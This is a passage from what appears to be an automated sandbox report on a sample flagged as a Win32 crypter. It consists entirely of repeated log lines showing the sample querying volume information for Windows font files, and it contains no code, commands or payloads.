            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
